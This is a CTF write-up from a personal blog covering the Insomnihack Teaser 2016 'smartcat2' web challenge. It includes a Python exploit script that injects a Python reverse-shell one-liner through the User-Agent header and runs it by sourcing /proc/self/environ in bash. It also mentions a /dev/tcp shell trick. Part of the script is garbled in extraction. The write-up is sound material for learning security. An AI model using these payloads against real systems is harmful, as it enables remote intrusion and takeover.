Insomnihack Teaser 2016 – smartcat2 – 50 pt Web Challenge

Reading time ~1 minute


Part 2 of this crazy cat challenge was a bit of a stumper, until I recalled some old school web techniques that haven’t really worked for a while now. In this challenge we need to get a shell and get the flag from /home/smartcat/. Without a “space” character that sounds tricky. I know a pretty trivial way to get a shell without the space character “bash</dev/tcp//" but that was not working on this box.

Instead I needed another way to get data onto the system, this turned out pretty simple… “/proc/self/environ”…

This contains several user controlled environment variables, such as the contents of “User-Agent:” header. Better still, the contents of User-Agent is not restricted in any way. So I simply used this exploit to send myself a reverse shell:


import requests

URL = ''

HOST = ''</span>	# your IP for the reverse shell
PORT = '4443'		# port you're listening on

s = requests.Session()

# Python backdoor in the user-agent with a # at the end
headers = { 'User-Agent' : ';python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + HOST + '",' + PORT + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);\' #' }

# the old /proc/self/environ trick
payload = { 'dest' : chr(0xa) + 'bash</proc/self/environ'}

print "[*] Exploiting..." 
print "[+] When you get the reverse shell, issue these commands:"
print "[+] cd /home/smartcat"
print "[+] ./readflag"
print "[+] Type \"Give me a...\""</span>
print "[+] wait 2 seconds..."
print "[+] Type \"... flag!\""</span>
r =, data=payload, headers=headers)



Note the presence of the "#" mark at the end of our Python reverse shell. This is key as it prevents Bash from continuing to interpret the /proc/self/environ file and running into a set of parenthesis that cause it to fail with a syntax error.

We get our reverse shell. We learn that /home/smartcat/flag is not readable by our user. Fair enough, that would be too easy. However there's a "readflag" setuid program that can read it for us. We need to have an interactive shell though. See highlighted selection below I found while trolling around via Burpsuite:


After learning all of this, and getting my shell, I was able to retrieve the flag!


niteCTF - CBC-Jail

A unique combination of Python jailbreak and crypto flaw that had me learning a lot about AES-CBC mode. Super fun for me to get this solu...… Continue reading

niteCTF - Rabin to the Rescue

Published on December 12, 2021

HTB CyberSanta 2021 - Crypto Writeups

Published on December 04, 2021